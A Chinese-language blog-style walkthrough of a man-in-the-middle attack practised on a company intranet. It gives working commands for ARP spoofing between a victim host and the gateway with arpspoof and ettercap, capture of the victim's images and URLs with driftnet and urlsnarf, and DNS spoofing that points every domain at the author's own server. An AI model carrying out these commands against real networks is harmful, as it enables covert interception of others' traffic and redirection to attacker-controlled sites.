正好在公司有机会玩玩内网渗透,于是实践一下中间人攻击
我所在的网段为10.0.100.0/24
攻击者主机IP:10.0.100.133
受害者主机IP:10.0.100.136
网关:10.0.100.1
先用nmap扫描看看目前内网中在使用的主机IP
使用命令
nmap -sS 10.0.100.* //扫描整个网段中的主机情况,-sS为半开放扫描,扫描不容易被对方发现
启用转发功能,linux的路由功能
此处设置为0时,arp欺骗后可以实现让对方断网
root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
向受害者发送ARP欺骗冒充网关,IP转发关闭时这一步后目标主机就无法上网了
arpspoof -i eth0 -t 10.0.100.136 10.0.100.1
向网关发送欺骗冒充受害者,有些网站上后面IP写成攻击者的IP,试了试好像也能成功,原因不清楚
arpspoof -i eth0 -t 10.0.100.1 10.0.100.136
完成这两步后受害者主机与网关之间的流量都会经过攻击者电脑了,使用driftnet可以看到受害者浏览的图片
driftnet -i eth0 -ad ./drif
driftnet,-i:选择网卡;-a:后台模式,图片保存在目录中不直接显示;-d:保存图片的路径
可以直接只指定网卡打开,即可不保存图片直接浏览,不过跳的很快看不见什么图就都过去了,建议使用上面的命令
driftnet -i eth0
用受害者电脑浏览网页后,攻击者电脑目录下即可看见受害者电脑浏览的图片
效果如下
ettercap -i eth0 -Tq -M arp:remote /10.0.100.136// ///
不填写IP地址则默认对整个子网全部主机欺骗
ettercap -i eth0 -Tq -M arp:remote /// ///
-i, –iface #选择网卡
-T, –text #文本模式显示
-q, –quiet #安静模式,不显示嗅探数据
-M arp #ARP欺骗
remote #双向模式,同时arp欺骗通信的双方,参数 -M arp:remote
oneway #单向模式,只arp欺骗第一个目标到第二个目标的通信,参数 -M arp:oneway
之后就能使用driftnet查看受害者浏览的图片了,使用urlsnarf可以查看到受害者浏览的网页详细信息
dsniff还有很多工具可以查看到被arp欺骗后的主机行为,后续再研究
arp欺骗之后可以继续进行dns欺骗,将目标主机向dns服务器发出的请求拦截,然后将解析的地址发送给目标主机。
nano /etc/ettercap/etter.dns
用文本编辑器打开ettercap的dns文件
在最后加上
* A 10.0.100.132
这里10.0.100.132是我自己搭建的一个网站服务器,所有网页域名都解析为10.0.100.132这个地址
ettercap -T -i eth0 -q -P dns_spoof /10.0.100.136// ///
-P, –plugin #载入插件
这里加入了dns_spoof插件实现dns欺骗
不填ip则对子网中所有主机欺骗
受害者主机所有域名都被解析为10.0.100.132了